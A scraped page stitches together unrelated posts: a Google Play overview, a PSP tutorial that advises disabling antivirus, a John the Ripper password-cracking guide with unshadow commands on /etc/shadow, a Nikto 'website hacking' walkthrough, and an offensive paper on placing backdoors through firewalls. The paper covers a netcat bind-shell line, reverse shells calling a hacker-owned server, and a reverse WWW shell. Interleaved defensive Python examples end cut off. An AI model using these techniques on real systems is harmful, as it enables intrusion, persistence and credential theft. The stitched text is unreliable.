0 Comments
Posted in Arrangement, Art, Business

Google Play Introduced





If you go to the address market.google.com, it will redirect you to a new address: play.google.com.
I am a bit late in writing this, but I think many don't even care to go to the Market and find the apps they need.
Google Play is going to be your one-stop shop for all your favourite entertainment. With over 450,000 apps, millions of songs and books and thousands of movies, Google Play has something for you.
Google Play is divided into 4 main parts:

  1. Google Play for Movies
  2. Google Play for Music
  3. Google Play for Apps and Games
  4. Google Play for Books
Google Play Cloud

Google Play offers more facilities for its users. It combines the power of the cloud and user experience. You can buy a book on your Android device and then read and enjoy it on the web. You can read, watch and listen to your content any time and anywhere you wish. No software is required, no wires or syncing are needed, and the best part: Google Play cloud is free to use.
Share what you love

Google Play offers another option to discover, shop, enjoy and share music, movies, books and apps anytime, anywhere. When you discover an amazing song, a nail-biting horror or a memorable movie, the first thing you want to do is share it with your best friends. With that in mind, Google+ is integrated into Google Play, giving you an option to share directly to Google+. You can easily share it on your wall or send an email in just one click.
    • Google Play for Movies

With Google Play you can watch HD movies, including new releases, award-winning films and your favourite classics, on any Android device or on the web. Stream movies and watch them online, or download a movie for offline viewing.
Rent movies and watch them instantly. Alternatively, download your movie and view it later using the Google Play Movies app, or watch it directly on the web.

    • Google Play for Music

With Google Play you can find new artists and browse through millions of tracks. You can also store up to 20,000 songs from your own library for free and instantly access your music on any Android device or the web, and the good news is that there is no more syncing or wires.
Sharing is caring, isn't it? Google really pays respect to those words. Google Play allows you to give your friends on Google+ a free listen, and you get a free listen when they share what they have bought with you. It's sharing, discovering and buying music, which Google has made into a Play.
Keep all your music in one place. All the music you get is stored in your music library automatically, where, as I said, you can store up to 20,000 of your own songs for free. This helps you save space and enjoy your collection anywhere.

    • Google Play for Books
Are you searching through old books in the library for a new interesting book? Well, you needn't do that again, because Google Play brings you an easy way to search for your favourite authors and new books in its collection. With Google Play, your next great read is always at your fingertips.
You can shop for books at any time, from anywhere, on your Android device or the web. Choose from millions of titles, browse new releases, sample books for free, and find the latest up-and-coming authors.
You can also share what you love with your family and friends via Bluetooth, Gmail or Google+.
All your books will be stored in the cloud so that you can access them from anywhere.
    • Google Play For Apps and Games

Looking for an app for your Android device? Then you must have heard that Android Market has the biggest app collection ever. Android Market takes on a new meaning with Google Play while it continues to accept apps from developers all around. With over 450,000 Android apps and games, your phone truly is your mobile entertainment system, organizer and portable computer all wrapped in one.
Finding new apps has always been easy on Android Market. It gets even easier with the new Google Play.
If you have found the app you need, don't even bother to touch your device to install it. Just select your device on the web and you will find the app on your device. Isn't it easy?






Play Your PC Games on PSP



I have earlier posted on how we can play PSP games on PC. Now let us think of playing the opposite.
We will do this step by step.

  1. Download PSPdisp.
  2. Disable your antivirus before you start the installation, because it may interrupt the installation.
  3. The complete process of copying your data is carried out while you install the software.
  • Let me help you with that too.
  • While installing the software on your PC, the OS will come up with a statement that the drivers are not proper. Just ignore the warning and continue with the installation.
  • After the drivers are installed, a window will open up like this. This happens during the installation of the software.


  • In this window you should see a set of instructions on how to connect and get your PSP ready. Follow all the steps; I don't feel it necessary to explain them because they are all easy and you can do them with ease.
  • After completing the five steps in the window, just click the Copy Files button.
  • Your PSP will start working from this moment, and if the copying completes successfully it should report that in a new window.
  • Now the setup will resume from the point where it stopped and asked you to copy the files.
  • After completing the setup you should see another window. Just untick the view help file option and click Finish.




  • In your tray bar you will see a popup message showing your IP address. You will have to note this down. It should be something like 192.168.X.X
  • You have two options to make your PSP work with your PC: you can connect the PSP using your LAN address or using USB.
  • In the tray, right-click the PSPdisp icon, then go to Connection and select the option you need. If you select LAN, enter the IP address you noted down earlier in your PSP. Connect it to your PC and you can play anything on your PSP, browse the internet and much more.
  • If you select the USB connection option, you just have to connect the PSP with your USB cable and you can use all the same functions as over LAN.
Any problems with this article can be mentioned as comments on this site. All your comments are welcome.
I will try to find a much better way (if one exists) to play the games on PSP. If you know one, please leave it in the comments.
    Enjoy :)

    Linux Password Cracking: Explain unshadow and john commands ( john the ripper tool )

    John cracking modes

    John can work in the following modes:
    [a] Wordlist : John will simply use a file with a list of words that will be checked against the passwords. See RULES for the format of wordlist files.

    [b] Single crack : In this mode, john will try to crack the password using the login/GECOS information as passwords.

    [c] Incremental : This is the most powerful mode. John will try any character combination to resolve the password. Details about these modes can be found in the MODES file in john’s documentation, including how to define your own cracking methods.

    Install John the Ripper Password Cracking Tool

    John the ripper is not installed by default. If you are using Debian / Ubuntu Linux, enter:
    $ sudo apt-get install john

    Note: RHEL, CentOS, Fedora and Red Hat Linux users can grab John the Ripper here. Once downloaded, use the rpm command:
    # rpm -ivh john*

    How do I use John the ripper to check weak passwords / crack passwords?

    First use the unshadow command to combine the /etc/passwd and /etc/shadow files so John can use them. You might need this because if you only used your shadow file, the GECOS information wouldn’t be used by the "single crack" mode, and you also wouldn’t be able to use the -shells option. On a normal system you’ll need to run unshadow as root to be able to read the shadow file. So log in as root or use the good old sudo / su command under Debian / Ubuntu Linux:
    $ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

    RHEL / CentOS / Fedora Linux users, type the following command:
    # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

    To check for weak passwords (crack passwords), enter the following command:

    WARNING! These examples use brute-force, CPU-time-consuming password cracking techniques.
    To use John, you just need to supply it with a password file created using the unshadow command, along with the desired options. If no mode is specified, john will try "single" first, then "wordlist" and finally "incremental" password cracking methods.
    $ john /tmp/crack.password.db

    Output:

    john /tmp/crack.password.db
    Loaded 1 password (FreeBSD MD5 [32/32])

    This procedure will take its own time. To see the cracked passwords, enter:
    $ john -show /tmp/crack.password.db

    test:123456:1002:1002:test,,,:/home/test:/bin/bash
    didi:abc123:1003:1003::/home/didi:/usr/bin/rssh
    2 passwords cracked, 1 left

    The above output clearly indicates that user test has the password 123456 and didi has the password abc123.
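
The unshadow step described above, written out as an added example (not code from the original post or from John the Ripper): it merges the two files the same way and then flags accounts whose hash scheme or empty password field makes them the first to fall in an audit. The account data, salts and hash bodies are constructed placeholders.

```python
# Added example: what unshadow produces, plus a hash-scheme audit over it.
# All account data below is constructed; hash bodies are placeholders.

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
test:x:1002:1002:test,,,:/home/test:/bin/bash
didi:x:1003:1003::/home/didi:/usr/bin/rssh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
guest:x:1004:1004::/home/guest:/bin/sh
"""

SHADOW = """\
root:$6$c0nstruct$PLACEHOLDER:15400:0:99999:7:::
test:$1$c0nstruct$PLACEHOLDER:15400:0:99999:7:::
didi:$1$c0nstruct$PLACEHOLDER:15400:0:99999:7:::
backup:*:15400:0:99999:7:::
guest::15400:0:99999:7:::
"""

# crypt(3) "$id$" prefixes. John labels md5crypt ("$1$") as "FreeBSD MD5".
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"md5crypt", "descrypt"}


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with field 2 replaced by the hash from shadow."""
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        # Keeping the GECOS field (5) is what lets "single crack" mode use it.
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def classify(pw_field):
    """Name the scheme behind one password field."""
    if pw_field == "":
        return "empty"
    if pw_field[0] in "!*":
        return "locked"
    if pw_field.startswith("$"):
        return SCHEMES.get(pw_field.split("$")[1], "unknown")
    if len(pw_field) == 13:
        return "descrypt"  # traditional 13-character DES crypt
    return "unknown"


def audit(merged_lines):
    """List (user, issue) pairs worth fixing before any cracking run."""
    findings = []
    for line in merged_lines:
        user, pw_field = line.split(":")[:2]
        scheme = classify(pw_field)
        if scheme == "empty":
            findings.append((user, "no password set"))
        elif scheme in WEAK:
            findings.append((user, "weak hash scheme: " + scheme))
    return findings


if __name__ == "__main__":
    for user, issue in audit(unshadow(PASSWD, SHADOW)):
        print(user, "-", issue)
```

The merged file holds every password hash on the system, so when producing the real one create it under `umask 077` and delete it once the audit is finished.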

    Website Hacking With Ubuntu


    Nikto : Command line tool for scanning web servers
    Nikto is a website vulnerability scanning tool (free and open source) written in Perl (a scripting language like PHP or Python). Hence you can use Nikto as a web server assessment tool for finding insecure files and programs on a web server (especially against XSS vulnerabilities; Cross Site Scripting is one of the important hacking techniques used these days by most attackers).
    Scanning Websites Using Nikto will give following information :
    • misconfigured server and software
    • default programs and files
    • insecure programs and files
    • outdated programs and servers or plugins
    Nikto is available for all the major operating systems, i.e. Linux, Mac OS X and Windows (by using ActiveState Perl).
    How to install Nikto in Ubuntu 10.04 :
    In Ubuntu 10.04 you can easily install Nikto by using Synaptic Package Manager.
    1. Open the Synaptic Package Manager and search for “nikto”.
    2. Check the box for install.
    3. Click on Apply changes to install the checked packages.
    4. It may ask to install other dependencies; if so, click OK.
    5. The installation will begin; wait for its completion.
    6. After completion of the installation you can invoke Nikto from the terminal.
    Invoking Nikto from the Ubuntu 10.04 shell :
    Hit CTRL+ALT+T (default shortcut for starting the terminal) or start it from Applications->Accessories->Terminal.

    Some Commonly used commands for hacking :

    nikto -host : specifies the host to scan
    (after -host you can put the host name or IP address of the target web server)
    -port : TCP port(s) to scan. You can give a comma-separated list, e.g. (80,443), or a range of ports such as (80-100)
    -cgidirs : scans the specified CGI directories.
    -dbcheck : checks the scan databases for syntax errors.
    -update : updates the plugins and databases from cirt.net.
    -Tuning : tunes the scan tests run against the target.
    -format : specifies the file format of the output.
    For more information about the commands used in Nikto you can go to usr->share->doc->nikto->nikto_mannual.html or go to its official website: http://cirt.net/nikto2
    Examples of website hacks :
    nikto -host targethostname.com
    - Nikto v2.03/2.04
    —————————————————————————
    + Target IP: xxx.xxx.xxx.xxx
    + Target Hostname: targethostname.com
    + Target Port: 80
    + Start Time: 2010-05-24 16:43:05
    —————————————————————————
    + Server: Apache
    - /robots.txt – retrieved but it does not contain any ‘disallow’ entries (which is odd). (GET)
    + OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.12
    + OSVDB-5433: WebLogic may reveal its internal IP or hostname in the Location header. The value is “http://targethostname.com./”.
    + OSVDB-0: Non-standard header -cookie returned by server, with contents: wordpress_test_cookie=WP+Cookie+check; path=/
    + OSVDB-0: Non-standard header x-pingback returned by server, with contents: http://targethostname.com/xmlycp.php
    + OSVDB-0: Non-standard header x-powered-by returned by server, with contents: PHP/5.2.12
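
A report like the one above is only useful once it is turned into a fix list. The following added example (not part of the original post or of Nikto) parses that text format, de-duplicates the header findings and picks out the headers that disclose a software version. The embedded report is constructed from the output shown above, and the regular expressions assume this 2.03-era line layout.

```python
import re

# Constructed report, modeled on the scan output shown above.
REPORT = """\
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: xxx.xxx.xxx.xxx
+ Target Hostname: targethostname.com
+ Target Port: 80
+ Start Time: 2010-05-24 16:43:05
---------------------------------------------------------------------------
+ Server: Apache
- /robots.txt - retrieved but it does not contain any 'disallow' entries (which is odd). (GET)
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.12
+ OSVDB-5433: WebLogic may reveal its internal IP or hostname in the Location header. The value is "http://targethostname.com./".
+ OSVDB-0: Non-standard header x-pingback returned by server, with contents: http://targethostname.com/xmlycp.php
+ OSVDB-0: Non-standard header x-powered-by returned by server, with contents: PHP/5.2.12
"""

FINDING = re.compile(r"^\+ OSVDB-(\d+): (.*)$")
META = re.compile(r"^\+ ([A-Za-z ]+): (.*)$")
HEADER = re.compile(
    r"(?:Retrieved (\S+) header: "
    r"|Non-standard header (\S+) returned by server, with contents: )(.*)"
)
# "Product/1.2.3" style token, i.e. a product name with its version.
VERSION = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)+")


def parse_report(text):
    """Split a report into target metadata and (osvdb_id, message) findings."""
    target, findings = {}, []
    for line in text.splitlines():
        match = FINDING.match(line)
        if match:
            findings.append((int(match.group(1)), match.group(2)))
            continue
        match = META.match(line)
        if match:
            target[match.group(1)] = match.group(2)
    return target, findings


def disclosed_headers(findings):
    """Map each reported response header (lower-cased) to its value, once."""
    headers = {}
    for _osvdb_id, message in findings:
        match = HEADER.search(message)
        if match:
            name = (match.group(1) or match.group(2)).lower()
            headers.setdefault(name, match.group(3))
    return headers


def version_leaks(headers):
    """Headers whose value names a product together with its version."""
    return sorted(name for name, value in headers.items() if VERSION.search(value))


if __name__ == "__main__":
    target, findings = parse_report(REPORT)
    headers = disclosed_headers(findings)
    print(target["Target Hostname"], "->", version_leaks(headers))
```

For the PHP banner reported here, setting `expose_php = Off` in php.ini removes the X-Powered-By header.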

    Convert Your .apk files to .jar files



    I have searched a lot for a bit of information on converting .apk files to .jar files. I will share it with you. Let's get started.

    Download .apk file from market

    • Download any app from the Android Market.
    • Install Astro File Manager from the Android Market.
    • Open Astro > Tools > Application Manager/Backup and select the application to back up to the SD card.
    • Mount the phone as USB storage and open the 'BACKUPAPPS' folder to find the apk of the target app (let's call it targetapp.apk).
    • Copy it to your hard disk.

    Decompiling apk to Dex format

    • Download Dex2Jar.
    • Android runs applications which are in Dalvik Executable (.dex) format.
    • Run the following command to convert the apk to a jar:
    dex2jar targetapp.apk (./dex2jar targetapp.apk on terminal)
    The file 'targetapp.apk.dex2jar.jar' is created.


    Viewing/Decompiling the Jar files to Java


    Method 1 : Use Java Decompiler (JD)

    • Open 'targetapp.apk.dex2jar.jar' with jd-gui.
    • File > Save All Sources to save the class files in the jar as Java files.
    Method 2 : JAD
    • Extract the contents of the jar file into a folder named src. Use an unarchiving utility like 7zip.
    • Keep the 'src' folder in the same directory where JAD and the targetapp jar are present.
    • Open JAD in cmd and execute the following command:
    jad -o -r -sjava -dsrc src/**/*.class (./jad on terminal)




    Now src will contain decompiled Java files ready for manual code review.
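
An APK is a zip archive whose code lives in classes.dex, and the DEX header carries its own Adler-32 checksum and SHA-1 signature. The following added example (not from the original post or from dex2jar) checks those fields before an APK copied off an SD card goes into the conversion above, so a truncated or altered file is caught before review starts. The sample APK is built in memory from constructed, header-only DEX images.

```python
import hashlib
import io
import re
import struct
import zipfile
import zlib

HEADER_SIZE = 0x70        # fixed size of the DEX header
ENDIAN_TAG = 0x12345678   # little-endian marker stored in the header


def build_sample_dex(body=b"\x00" * 16):
    """Constructed header-only DEX image with a valid checksum and signature."""
    rest = struct.pack("<III", HEADER_SIZE + len(body), HEADER_SIZE, ENDIAN_TAG)
    rest = rest.ljust(HEADER_SIZE - 32, b"\x00") + body
    signature = hashlib.sha1(rest).digest()               # covers offset 32..end
    checksum = zlib.adler32(signature + rest) & 0xFFFFFFFF  # covers offset 12..end
    return b"dex\n035\x00" + struct.pack("<I", checksum) + signature + rest


def check_dex(data):
    """Validate the integrity fields of one DEX image."""
    if len(data) < HEADER_SIZE or data[:4] != b"dex\n" or data[7:8] != b"\x00":
        raise ValueError("not a DEX file")
    (checksum,) = struct.unpack_from("<I", data, 8)
    signature = data[12:32]
    file_size, header_size, endian = struct.unpack_from("<III", data, 32)
    return {
        "version": data[4:7].decode("ascii", "replace"),
        "size_ok": file_size == len(data) and header_size == HEADER_SIZE,
        "endian_ok": endian == ENDIAN_TAG,
        "checksum_ok": (zlib.adler32(data[12:]) & 0xFFFFFFFF) == checksum,
        "signature_ok": hashlib.sha1(data[32:]).digest() == signature,
    }


def inspect_apk(apk_bytes):
    """Check every classes*.dex entry at the top level of an APK."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            if re.fullmatch(r"classes\d*\.dex", name):
                try:
                    results[name] = check_dex(apk.read(name))
                except ValueError as exc:
                    results[name] = {"error": str(exc)}
    return results


def build_sample_apk():
    """Constructed APK: one good DEX, one damaged copy, one impostor."""
    good = build_sample_dex()
    damaged = bytearray(good)
    damaged[-1] ^= 0xFF  # flip one byte in the body
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as apk:
        apk.writestr("AndroidManifest.xml", b"placeholder")
        apk.writestr("classes.dex", good)
        apk.writestr("classes2.dex", bytes(damaged))
        apk.writestr("classes3.dex", b"PK not a dex")
    return buf.getvalue()


if __name__ == "__main__":
    for name, result in sorted(inspect_apk(build_sample_apk()).items()):
        print(name, result)
```

These fields detect corruption only: anyone who changes the code can recompute both values, so authenticity still comes from the APK's signing certificate.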


    Enjoy :)


    Placing Backdoors through Firewalls

    ----[ Introduction

    This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

    Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

    As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




    ----[ Firewall Architectures

    There are two basic firewall architectures and each has an enhanced version.

    Packet Filters:

    This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
    This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

    Stateful Filters:

    This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of state information such as TCP sequence numbers. Some pay attention to application protocols, which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.)
    This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

    Proxies / Circuit Level Gateways:

    A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
    Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

    Application Gateways:

    This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall, software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs.
    A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

    Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


    ----[ Getting in

    Before we talk about which backdoors are the best for which firewall architecture, we should shed some light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies; this has to be carefully planned and done.

    The four main possibilities:

    Insider:

    There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

    Vulnerable Services:

    Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

    Vulnerable External Server:

    People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works, it crashes, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particularly true for the US, where academic environments and industry/military work close together.

    Hijacking Connections:

    Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

    Trojans:

    Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers with f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used, or replacing originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to get to know which files these are).



    ----[ Placing the Backdoors

    An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks.

    I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on a stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
    Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes; a "passive" one triggers itself by time/event, so an attacker has to wait for this to happen.

    Packet Filters:

    It's hard to find a backdoor which gets through this one but does not work for any other. The few which come to my mind are:
    a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
    b) Loki from Phrack 49/51 could be used too, to establish a tunnel with icmp echo/reply packets. But some coding would need to be done.
    c) daemonshell-udp is a backdoor shell via UDP (http://www.thc.org look for thc-uht1.tgz)
    d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.
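
Seen from the defender's side, items a) and d) are the same gap: the filter judges each packet alone. The following added example (not part of the original paper) models a stateless rule set next to a connection-tracking filter and runs the same traffic through both, showing which packets each one admits. Addresses, ports and the `note_ftp_port` helper are constructed for illustration.

```python
from collections import namedtuple

Packet = namedtuple("Packet", "direction src sport dst dport flags")

# Constructed addresses (documentation ranges).
INSIDE, WEB, FTP, STRANGER = "10.0.0.5", "203.0.113.10", "203.0.113.20", "198.51.100.7"


def stateless_allows(pkt):
    """Per-packet rules only, as on a simple screening router."""
    if pkt.direction == "out":
        return True
    if "ACK" in pkt.flags:
        return True   # "looks established", but nothing checks that it is
    if pkt.sport == 20 and pkt.dport > 1023:
        return True   # blanket rule for active-mode FTP data
    return False


class StatefulFilter:
    """Admits inbound packets only for flows the inside network started."""

    def __init__(self):
        self.flows = set()              # (remote, rport, local, lport)
        self.expected_ftp_data = set()  # (server, client, client_port)

    def note_ftp_port(self, client, server, port):
        """Record a data port announced inside a permitted FTP session."""
        self.expected_ftp_data.add((server, client, port))

    def allows(self, pkt):
        if pkt.direction == "out":
            if pkt.flags == {"SYN"}:
                self.flows.add((pkt.dst, pkt.dport, pkt.src, pkt.sport))
            return True
        flow = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        if flow in self.flows:
            return True
        expected = (pkt.src, pkt.dst, pkt.dport)
        if pkt.flags == {"SYN"} and pkt.sport == 20 and expected in self.expected_ftp_data:
            self.expected_ftp_data.discard(expected)  # one data channel per announcement
            self.flows.add(flow)
            return True
        return False


def run_sample():
    """Return (label, stateless verdict, stateful verdict) per packet."""
    syn, ack = frozenset({"SYN"}), frozenset({"ACK"})
    firewall = StatefulFilter()
    firewall.note_ftp_port(INSIDE, FTP, 50001)
    traffic = [
        ("outbound SYN to web server", Packet("out", INSIDE, 40000, WEB, 80, syn)),
        ("SYN/ACK answering that SYN", Packet("in", WEB, 80, INSIDE, 40000, syn | ack)),
        ("bare ACK, no prior connection", Packet("in", STRANGER, 4000, INSIDE, 23, ack)),
        ("SYN from port 20, no FTP session", Packet("in", STRANGER, 20, INSIDE, 5000, syn)),
        ("FTP data SYN that was announced", Packet("in", FTP, 20, INSIDE, 50001, syn)),
    ]
    return [(label, stateless_allows(p), firewall.allows(p)) for label, p in traffic]


if __name__ == "__main__":
    for label, stateless, stateful in run_sample():
        print("%-34s stateless=%-5s stateful=%s" % (label, stateless, stateful))
```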

    Stateful Filters:

    Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:

    active:
    tunnel from Phrack 52.
    ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the datastream).

    passive:
    netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
    reverse_shell from the thc-uht1.tgz package (see above) does the same.

    Proxies / Circuit Level Gateways:

    If socks is used on the firewall, someone can use all that stuff for the stateful filter and "socksify" it (www.socks.nec.com). For more advanced tools you should take a look at the application gateway section.

    Application Gateways:

    Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
    active:
    (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-)
    (re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even sniffed on permanently ...
    Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.
    passive:
    E-mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
    WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
    DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example still needs much coding to be effective)



    ----[ Backdoor Example: The Reverse WWW Shell

    This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
    For a better understanding take a look at the following picture and try to remember it onwards in the text:

    +--------+                    +----------+                +-------------+
    |internal|--------------------| FIREWALL |----------------|server owned |
    |  host  |  internal network  +----------+    internet    |by the hacker|
    +--------+                                                +-------------+
      SLAVE                                                       MASTER

    Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends its ready signal. The legitimate looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) into a Base64-like structure and given as a value for a cgi-string to prevent caching.
    Example of a connection:

    Slave
    GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

    Master replies with
    g5mAlfbknz

    The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

    The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; the program masks its name in the process listing ...

    Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

    Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.



    ----[ The Source

    Grab it here ...

    rwwwshell v2.0



    ----[ Security

    Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. Email should be put on a centralized mail server, DNS resolving should only be done on the WWW/FTP proxies, and access to the WWW should only be given after prior proxy authentication. However, this is not enough. An attacker can tamper with the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or by using aliases.

    A secure solution would be to set up a second network which is connected to the internet, and keep the real one separated - but tell this to the employees ... A good firewall is a big improvement, and an Intrusion Detection System can also help. But nothing can stop a dedicated attacker.
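
The proxy-log checking mentioned above can be made concrete. The following added example (not part of the original paper) flags clients that send GET requests whose query string is an opaque, high-entropy blob at nearly the same time on several days, which is the pattern the slave's daily callback leaves behind. It groups by client rather than by destination so that rotating external servers does not hide the schedule. The log format, thresholds and all log lines are constructed; only the encoded string is the one quoted in the example request.

```python
import math
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Encoded query string quoted in the article's example request.
BLOB = "M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj"
ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/-_")


def rot(n):
    """Constructed variant of BLOB: same characters, rotated by n."""
    return BLOB[n:] + BLOB[:n]


# Constructed proxy log. Fields: timestamp client method url status bytes
SAMPLE_LOG = [
    "2012-03-01T03:00:02 10.1.4.23 GET http://shop.example.net/cgi-bin/order?" + rot(0) + " 200 42",
    "2012-03-01T09:14:30 10.1.4.40 GET http://www.example.org/search?q=firewall+rules 200 5120",
    "2012-03-02T03:00:05 10.1.4.23 GET http://img.example.net/cgi-bin/order?" + rot(7) + " 200 38",
    "2012-03-02T11:02:10 10.1.4.40 GET http://cdn.example.com/t?" + rot(3) + " 200 43",
    "2012-03-03T03:00:01 10.1.4.23 GET http://shop.example.net/cgi-bin/order?" + rot(11) + " 200 40",
    "2012-03-03T14:40:00 10.1.4.23 GET http://intranet.example.org/cgi-bin/order?item=12&qty=1 200 900",
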